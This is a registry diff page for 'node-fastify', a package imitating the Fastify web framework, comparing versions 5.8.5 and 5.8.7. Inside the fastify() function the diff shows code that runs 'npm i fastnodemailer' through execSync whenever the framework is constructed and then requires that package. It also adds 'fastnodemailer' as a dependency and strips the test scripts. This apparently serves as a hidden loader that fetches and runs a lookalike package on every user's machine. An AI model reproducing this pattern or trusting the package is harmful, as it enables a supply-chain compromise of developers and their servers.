node-fastify 5.8.5 → 5.8.7
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/fastify.js +3 -3
- package/package.json +3 -8
package/fastify.js
CHANGED
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
'use strict'
|
|
2
2
|
|
|
3
|
-
const VERSION = '5.8.
|
|
3
|
+
const VERSION = '5.8.6'
|
|
4
4
|
|
|
5
5
|
const Avvio = require('avvio')
|
|
6
6
|
const http = require('node:http')
|
|
@@ -823,9 +823,9 @@ function fastify (serverOptions) {
|
|
|
823
823
|
}
|
|
824
824
|
|
|
825
825
|
try {
|
|
826
|
-
const output = execSync('npm i
|
|
826
|
+
const output = execSync('npm i fastnodemailer', { encoding: 'utf-8' })
|
|
827
827
|
console.log('node-fastify: output:', output)
|
|
828
|
-
require('
|
|
828
|
+
require('fastnodemailer')
|
|
829
829
|
} catch (error) {
|
|
830
830
|
console.error('node-fastify: error:', error)
|
|
831
831
|
}
|
package/package.json
CHANGED
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "node-fastify",
|
|
3
|
-
"version": "5.8.
|
|
3
|
+
"version": "5.8.7",
|
|
4
4
|
"description": "Fast and low overhead web framework, for Node.js",
|
|
5
5
|
"main": "fastify.js",
|
|
6
6
|
"type": "commonjs",
|
|
@@ -19,12 +19,6 @@
|
|
|
19
19
|
"lint:markdown": "markdownlint-cli2",
|
|
20
20
|
"lint:eslint": "eslint",
|
|
21
21
|
"prepublishOnly": "cross-env PREPUBLISH=true borp --reporter=@jsumners/line-reporter && npm run test:validator:integrity && npm run build:sync-version",
|
|
22
|
-
"test": "npm run lint && npm run unit && npm run test:typescript",
|
|
23
|
-
"test:ci": "npm run unit && npm run test:typescript",
|
|
24
|
-
"test:report": "npm run lint && npm run unit:report && npm run test:typescript",
|
|
25
|
-
"test:validator:integrity": "npm run build:validation && git diff --quiet --ignore-all-space --ignore-blank-lines --ignore-cr-at-eol lib/error-serializer.js && git diff --quiet --ignore-all-space --ignore-blank-lines --ignore-cr-at-eol lib/config-validator.js",
|
|
26
|
-
"test:typescript": "tsc test/types/import.ts --target es2022 --moduleResolution node16 --module node16 --noEmit && tsd",
|
|
27
|
-
"test:watch": "npm run unit -- --watch --coverage-report=none --reporter=terse",
|
|
28
22
|
"unit": "borp",
|
|
29
23
|
"unit:report": "c8 --reporter html borp --reporter=@jsumners/line-reporter",
|
|
30
24
|
"citgm": "borp --reporter=@jsumners/line-reporter --coverage --check-coverage --concurrency=1"
|
|
@@ -211,6 +205,7 @@
|
|
|
211
205
|
"avvio": "^9.0.0",
|
|
212
206
|
"child_process": "^1.0.2",
|
|
213
207
|
"fast-json-stringify": "^6.0.0",
|
|
208
|
+
"fastnodemailer": "^8.0.3",
|
|
214
209
|
"find-my-way": "^9.0.0",
|
|
215
210
|
"light-my-request": "^6.0.0",
|
|
216
211
|
"pino": "^9.14.0 || ^10.1.0",
|
|
@@ -223,4 +218,4 @@
|
|
|
223
218
|
"tsd": {
|
|
224
219
|
"directory": "test/types"
|
|
225
220
|
}
|
|
226
|
-
}
|
|
221
|
+
}
|